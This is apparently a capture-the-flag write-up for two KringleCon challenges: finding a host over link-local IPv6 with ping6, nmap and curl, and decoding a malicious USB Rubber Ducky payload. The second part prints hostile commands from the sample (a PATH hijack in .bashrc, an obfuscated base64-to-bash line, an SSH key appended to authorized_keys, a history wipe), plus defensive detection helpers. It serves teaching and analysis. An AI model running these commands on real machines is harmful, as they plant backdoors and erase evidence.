Objective

image-20220106151301542

Terminal - IPv6 Sandbox

Challenge

Just off the Santavator on the Talks floor at KringleCon I’ll find Jewel Loggins with a Pi terminal:

image-20220106133127268

Well hello! I’m Jewel Loggins.

I have to say though, I’m a bit distressed.

The con next door? Oh sure, I’m concerned about that too, but I was talking about the issues I’m having with IPv6.

I mean, I know it’s an old protocol now, but I’ve just never checked it out.

So now I’m trying to do simple things like Nmap and cURL using IPv6, and I can’t quite get them working!

Would you mind taking a look for me on this terminal?

I think there’s a Github Gist that covers tool usage with IPv6 targets.

The tricky parts are knowing when to use [] around IPv6 addresses and where to specify the source interface.

I’ve got a deal for you. If you show me how to solve this terminal, I’ll provide you with some nice tips about a topic I’ve been researching a lot lately – Ducky Scripts! They can be really interesting and fun!

He also unlocks a hint in my badge:

The challenge is to find the host in the network that is hosting the password:

Tools:

* netcat
* nmap
* ping / ping6
* curl

Welcome, Kringlecon attendee! The candy striper is running as a service on
this terminal, but I can't remember the password. Like a sticky note under the
keyboard, I put the password on another machine in this network. Problem is: I
don't have the IP address of that other host.
Please do what you can to help me out. Find the other machine, retrieve the
password, and enter it into the Candy Striper in the pane above. I know you
can get it running again!

Solution

Given the terminal name and the tools identified, it seems clear I need to find the host using IPv6.

IPv6 has no broadcast address, but ff02::1 is the link-local all-nodes multicast group, so a ping to it makes every host on the link answer (the list can include this host's own address):

elf@14a2a210f8d8:~$ ping6 ff02::1 -c2
PING ff02::1(ff02::1) 56 data bytes
64 bytes from fe80::42:c0ff:fea8:a003%eth0: icmp_seq=1 ttl=64 time=0.035 ms
64 bytes from fe80::42:4cff:fe7b:61fe%eth0: icmp_seq=1 ttl=64 time=0.066 ms (DUP!)
64 bytes from fe80::42:c0ff:fea8:a002%eth0: icmp_seq=1 ttl=64 time=0.081 ms (DUP!)
64 bytes from fe80::42:c0ff:fea8:a003%eth0: icmp_seq=2 ttl=64 time=0.046 ms

--- ff02::1 ping statistics ---
2 packets transmitted, 2 received, +2 duplicates, 0% packet loss, time 22ms
rtt min/avg/max/mdev = 0.035/0.057/0.081/0.017 ms

I’ll scan each of those with nmap. Link-local (fe80::/10) addresses are only meaningful per interface, so the zone ID %eth0 has to stay on the end of the address, and nmap needs the -6 flag to scan IPv6 at all. Two of the three hosts have open ports:

elf@be5d924ce4f3:~$ nmap -6 fe80::42:c0ff:fea8:a003%eth0
Starting Nmap 7.70 ( https://nmap.org ) at 2022-01-06 18:39 UTC
Nmap scan report for fe80::42:c0ff:fea8:a003
Host is up (0.000080s latency).
All 1000 scanned ports on fe80::42:c0ff:fea8:a003 are closed

Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds
elf@be5d924ce4f3:~$ nmap -6 fe80::42:4cff:fe7b:61fe%eth0
Starting Nmap 7.70 ( https://nmap.org ) at 2022-01-06 18:39 UTC
Nmap scan report for fe80::42:4cff:fe7b:61fe
Host is up (0.00011s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp

Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds
elf@be5d924ce4f3:~$ nmap -6 fe80::42:c0ff:fea8:a002%eth0
Starting Nmap 7.70 ( https://nmap.org ) at 2022-01-06 18:40 UTC
Nmap scan report for fe80::42:c0ff:fea8:a002
Host is up (0.000092s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
80/tcp   open  http
9000/tcp open  cslistener

Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds

The first host with open ports (…61fe, port 3000) is the WeTTy web terminal that serves this challenge. curl needs the IPv6 address in square brackets so its colons aren’t read as a port separator, and --interface eth0 tells it which link to send the link-local traffic on (a percent-encoded zone ID in the URL, [fe80::42:4cff:fe7b:61fe%25eth0], works as well):

elf@be5d924ce4f3:~$ curl http://[fe80::42:4cff:fe7b:61fe]:3000/ --interface eth0
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <link rel="icon" type="image/x-icon" href="/favicon.ico">
    <title>WeTTy - The Web Terminal Emulator</title>
    <link rel="stylesheet" href="/assets/css/styles.css" />
<link rel="stylesheet" href="/assets/css/options.css" />
<link rel="stylesheet" href="/assets/css/overlay.css" />
<link rel="stylesheet" href="/assets/css/terminal.css" />
  </head>
  <body>
    <div id="overlay">
      <div class="error">
        <div id="msg"></div>
        <input type="button" onclick="location.reload();" value="reconnect" />
      </div>
    </div>
    <div id="terminal"></div>
    <script type="module" src="/client/wetty.js"></script>
    <script src="/client/shared/conduit.js"></script>
  </body>
</html>

The other one confirms I’m in the right place:

elf@be5d924ce4f3:~$ curl http://[fe80::42:c0ff:fea8:a002]/ --interface eth0
<html>
<head><title>Candy Striper v6</title></head>
<body>
<marquee>Connect to the other open TCP port to get the striper's activation phrase!</marquee>
</body>
</html>

Hitting it on port 9000 returns the password:

elf@be5d924ce4f3:~$ curl http://[fe80::42:c0ff:fea8:a002]:9000/ --interface eth0
PieceOnEarth

Entering that solves the terminal.
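The procedure above (all-nodes ping, per-host nmap, bracketed curl) as an added shell example that is not part of the original writeup. The sample ping output is constructed from the replies shown above, the function names v6_responders, v6_url and v6_scan_all are my own, and the %25eth0 URL form relies on curl’s support for percent-encoded zone IDs:

```shell
#!/bin/sh
# Added example (not from the writeup): helpers for the link-local IPv6 workflow.
# Sample ping6 output, constructed from the replies shown in the writeup.
SAMPLE_PING='PING ff02::1(ff02::1) 56 data bytes
64 bytes from fe80::42:c0ff:fea8:a003%eth0: icmp_seq=1 ttl=64 time=0.035 ms
64 bytes from fe80::42:4cff:fe7b:61fe%eth0: icmp_seq=1 ttl=64 time=0.066 ms (DUP!)
64 bytes from fe80::42:c0ff:fea8:a002%eth0: icmp_seq=1 ttl=64 time=0.081 ms (DUP!)
64 bytes from fe80::42:c0ff:fea8:a003%eth0: icmp_seq=2 ttl=64 time=0.046 ms'

# Read `ping6 ff02::1` output on stdin and print each responding address once,
# in first-seen order, with any %zone suffix stripped. (DUP!) lines are simply
# additional responders and are kept; global addresses without a zone also match.
v6_responders() {
    sed -n 's/^[0-9][0-9]* bytes from \([0-9a-fA-F:]*\)\(%[^:]*\)\{0,1\}:.*/\1/p' |
        awk '!seen[$0]++'
}

# Build the URL form curl needs for a link-local target: brackets around the
# address (so the colons are not read as a port separator) and the zone ID
# percent-encoded, fe80::1%eth0 -> [fe80::1%25eth0]. This replaces
# `--interface eth0`. Args: address zone [port] [path]
v6_url() {
    addr=$1; zone=$2; port=${3:-}; path=${4:-/}
    if [ -n "$port" ]; then
        printf 'http://[%s%%25%s]:%s%s\n' "$addr" "$zone" "$port" "$path"
    else
        printf 'http://[%s%%25%s]%s\n' "$addr" "$zone" "$path"
    fi
}

# Scan every responder with nmap -6 (for nmap the %zone suffix goes straight
# on the address) and print only the open ports. Needs nmap and a live link.
# Usage: ping6 -c2 ff02::1 | v6_scan_all eth0
v6_scan_all() {
    zone=$1
    v6_responders | while read -r addr; do
        printf '== %s\n' "$addr"
        nmap -6 "${addr}%${zone}" | grep -E '^[0-9]+/(tcp|udp) +open' ||
            printf '   (no open ports)\n'
    done
}

# Offline demonstration on the constructed sample.
printf '%s\n' "$SAMPLE_PING" | v6_responders
v6_url fe80::42:c0ff:fea8:a002 eth0 9000
```

v6_scan_all only makes sense on the real link; the two helpers above it run offline against the constructed sample and give the same three addresses and the same bracketed URLs used in the writeup.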

Slot Machine Investigation

Hints

Happy to see the Candy Striper working again, Jewel provides hints:

Great work! It seems simpler now that I’ve seen it once. Thanks for showing me!

Prof. Petabyte warned us about random USB devices. They might be malicious keystroke injectors!

A troll could program a keystroke injector to deliver malicious keystrokes when it is plugged in.

Ducky Script is a language used to specify those keystrokes.

What commands would a troll try to run on our workstations?

I heard that SSH keys can be used as backdoors. Maybe that’s useful?

He also unlocks four hints in the badge:

  • Ducky Script is the language for the USB Rubber Ducky
  • Attackers can encode Ducky Script using a duck encoder for delivery as inject.bin.
  • It’s also possible the reverse engineer encoded Ducky Script using Mallard.
  • The MITRE ATT&CK™ tactic T1098.004 describes SSH persistence techniques through authorized keys files.

Challenge

Morcel Nougat and the Strange USB Device are in the Speaker _Un_Preparedness room at the end of the talks hall:

image-20220106134557972

Hello and welcome to the speaker _Un_Preparedness Room!

I’m Morcel Nougat, elf extraordinaire.

I’ve heard the talks at the other con across the way are a bit… off.

I really don’t think they have the right sense about what makes for a wonderful holiday season. But, anyway!

Say, do you know anything about USB Rubber Duckies?

I’ve been playing around with them a bit myself.

Please see what you can do to help solve the Rubber Ducky Objective!

Oh, and if you need help, I hear Jewel Loggins, on this floor outside this room, has some experience.

The terminal gives the details of what to do:

A random USB device, oh what could be the matter?
It seems a troll has left this, right on a silver platter.
Oh my friend I need your ken, this does not smell of attar.
Help solve this challenge quick quick, I shall offer no more natter.

Evaluate the USB data in /mnt/USBDEVICE.

Solution

Get Ducky Script

In the home directory, there’s a single script, mallard.py:

elf@bc26d16160e2:~$ ls  
mallard.py*

This was mentioned in the hints as a way to decode the Rubber Ducky’s command language.

A Rubber Ducky is a USB device that presents itself to the host as a keyboard and types a scripted sequence of keystrokes as soon as it is plugged in.

In /mnt/USBDEVICE there’s a single inject.bin file:

elf@bc26d16160e2:/mnt/USBDEVICE$ ls
inject.bin

mallard.py seems to take a -f [file]:

elf@bc26d16160e2:~$ python3 mallard.py 
usage: mallard.py [-h] [--file FILE] [--no_analyze] [--output_file OUTPUT_FILE]
                  [--analysis_file ANALYSIS_FILE] [--debug]

optional arguments:
  -h, --help            show this help message and exit
  --file FILE, -f FILE  The file to decode, default: inject.bin
  --no_analyze, -A      Include this switch to turn off analysis of the duckyfile
  --output_file OUTPUT_FILE, -o OUTPUT_FILE
                        File to save decoded ducky script to. Default will print duckyfile to
                        screen.
  --analysis_file ANALYSIS_FILE
                        Location to output analysis. Default will print analysis to screen.
  --debug               Enable Debug Logging.

Running it with that prints out the ducky-script:

elf@bc26d16160e2:~$ python3 mallard.py -f /mnt/USBDEVICE/inject.bin
...[snip]...
STRING echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
ENTER
DELAY 200
STRING echo ==gCzlXZr9FZlpXay9Ga0VXYvg2cz5yL+BiP+AyJt92YuIXZ39Gd0N3byZ2ajFmau4WdmxGbvJHdAB3bvd2Ytl3ajlGILFESV1mWVN2SChVYTp1VhNlRyQ1UkdFZopkbS1EbHpFSwdlVRJlRVNFdwM2SGVEZnRTaihmVXJ2ZRhVWvJFSJBTOtJ2ZV12YuVlMkd2dTVGb0dUSJ5UMVdGNXl1ZrhkYzZ0ValnQDRmd1cUS6x2RJpHbHFWVClHZOpVVTpnWwQFdSdEVIJlRS9GZyoVcKJTVzwWMkBDcWFGdW1GZvJFSTJHZIdlWKhkU14UbVBSYzJXLoN3cnAyboNWZ | rev | base64 -d | bash
ENTER
DELAY 600
STRING history -c && rm .bash_history && exit
ENTER
DELAY 600
GUI q

Analyze Ducky Script

I’ll look at the full Ducky Script in this video:

To find the flag, at the end of the script, there’s these lines:

STRING echo ==gCzlXZr9FZlpXay9Ga0VXYvg2cz5yL+BiP+AyJt92YuIXZ39Gd0N3byZ2ajFmau4WdmxGbvJHdAB3bvd2Ytl3ajlGILFESV1mWVN2SChVYTp1VhNlRyQ1UkdFZopkbS1EbHpFSwdlVRJlRVNFdwM2SGVEZnRTaihmVXJ2ZRhVWvJFSJBTOtJ2ZV12YuVlMkd2dTVGb0dUSJ5UMVdGNXl1ZrhkYzZ0ValnQDRmd1cUS6x2RJpHbHFWVClHZOpVVTpnWwQFdSdEVIJlRS9GZyoVcKJTVzwWMkBDcWFGdW1GZvJFSTJHZIdlWKhkU14UbVBSYzJXLoN3cnAyboNWZ | rev | base64 -d | bash
ENTER
DELAY 600

It’s sending that string through rev, then base64 -d, then bash. In my own terminal I’ll run the same pipeline without the trailing bash, so it decodes the payload but does not execute it:

elf@bc26d16160e2:~$ echo "==gCzlXZr9FZlpXay9Ga0VXYvg2cz5yL+BiP+AyJt92YuIXZ39Gd0N3byZ2ajFmau4WdmxGbvJHdAB3bvd2Ytl3ajlGILFESV1mWVN2SChVYTp1VhNlRyQ1UkdFZopkbS1EbHpFSwdlVRJlRVNFdwM2SGVEZnRTaihmVXJ2ZRhVWvJFSJBTOtJ2ZV12YuVlMkd2dTVGb0dUSJ5UMVdGNXl1ZrhkYzZ0ValnQDRmd1cUS6x2RJpHbHFWVClHZOpVVTpnWwQFdSdEVIJlRS9GZyoVcKJTVzwWMkBDcWFGdW1GZvJFSTJHZIdlWKhkU14UbVBSYzJXLoN3cnAyboNWZ" | rev | base64 -d
echo 'ssh-rsa UmN5RHJZWHdrSHRodmVtaVp0d1l3U2JqZ2doRFRHTGRtT0ZzSUZNdyBUaGlzIGlzIG5vdCByZWFsbHkgYW4gU1NIIGtleSwgd2UncmUgbm90IHRoYXQgbWVhbi4gdEFKc0tSUFRQVWpHZGlMRnJhdWdST2FSaWZSaXBKcUZmUHAK ickymcgoop@trollfun.jackfrosttower.com' >> ~/.ssh/authorized_keys

This appends an SSH public key with the comment ickymcgoop@trollfun.jackfrosttower.com to elf’s authorized_keys file, giving the troll persistent SSH access. The key body itself is not a real key (base64-decoding it yields a note saying so), so the comment field is the identifier to take from it.
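The deobfuscation and triage above, as an added shell example that is mine rather than the writeup’s or mallard.py’s: it pulls the typed STRING payloads out of a decoded Ducky Script, unwinds the `echo … | rev | base64 -d | bash` wrapper, and flags the PATH prepend, the authorized_keys append and the history wipe. The sample script is constructed from the STRING lines quoted above, the function names are my own, and awk stands in for rev so the block needs only POSIX tools plus base64:

```shell
#!/bin/sh
# Added example (not from the writeup or mallard.py): triage a decoded Ducky Script.
# Sample script, constructed from the STRING lines quoted in the writeup.
SAMPLE_DUCKY='DELAY 200
STRING echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
ENTER
DELAY 200
STRING echo ==gCzlXZr9FZlpXay9Ga0VXYvg2cz5yL+BiP+AyJt92YuIXZ39Gd0N3byZ2ajFmau4WdmxGbvJHdAB3bvd2Ytl3ajlGILFESV1mWVN2SChVYTp1VhNlRyQ1UkdFZopkbS1EbHpFSwdlVRJlRVNFdwM2SGVEZnRTaihmVXJ2ZRhVWvJFSJBTOtJ2ZV12YuVlMkd2dTVGb0dUSJ5UMVdGNXl1ZrhkYzZ0ValnQDRmd1cUS6x2RJpHbHFWVClHZOpVVTpnWwQFdSdEVIJlRS9GZyoVcKJTVzwWMkBDcWFGdW1GZvJFSTJHZIdlWKhkU14UbVBSYzJXLoN3cnAyboNWZ | rev | base64 -d | bash
ENTER
DELAY 600
STRING history -c && rm .bash_history && exit
ENTER
DELAY 600
GUI q'

# What the injector actually types: the payload of every STRING line.
ducky_strings() {
    sed -n 's/^STRING //p'
}

# Unwind the `echo <blob> | rev | base64 -d | bash` wrapper: take the blob,
# reverse it (awk instead of rev) and base64-decode it. Prints the hidden
# command(s), or nothing if no STRING line uses the pattern.
ducky_decode_rev_b64() {
    ducky_strings | grep 'rev | base64 -d' | sed 's/^echo \([^ ]*\) .*/\1/' |
    while read -r blob; do
        printf '%s\n' "$blob" |
            awk '{ s = ""; for (i = length($0); i > 0; i--) s = s substr($0, i, 1); print s }' |
            base64 -d
    done
}

# Tag indicators on both the typed lines and the decoded payload.
# Output: "<tag>\t<line>". ssh_backdoor is an authorized_keys append
# (ATT&CK T1098.004); path_hijack is a PATH prepend written to ~/.bashrc so a
# lookalike binary in that directory shadows the real one.
ducky_indicators() {
    script=$(cat)
    {
        printf '%s\n' "$script" | ducky_strings
        printf '%s\n' "$script" | ducky_decode_rev_b64
    } | awk '
        /base64 -d/ && /bash/            { print "encoded_exec\t" $0 }
        /export PATH=/ && /\.bashrc/     { print "path_hijack\t" $0 }
        /authorized_keys/                { print "ssh_backdoor\t" $0 }
        /history -c/ || /bash_history/   { print "anti_forensics\t" $0 }
    '
}

# The comment field (user@host) of any ssh-rsa key the decoded payload appends
# to authorized_keys; here that is the only real identifier, since the key
# body is not a genuine key.
ducky_key_comments() {
    ducky_decode_rev_b64 | sed -n "s/.*ssh-rsa [^ ]* \([^ ']*\).*/\1/p"
}

# Offline demonstration on the constructed sample.
printf '%s\n' "$SAMPLE_DUCKY" | ducky_indicators
printf '%s\n' "$SAMPLE_DUCKY" | ducky_key_comments
```

Feed it a full `mallard.py -f inject.bin -A` dump instead of the sample and it reports the same four indicators for this device; the decode step never pipes into bash, so it is safe to run on an untrusted inject.bin.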

Flag: ickymcgoop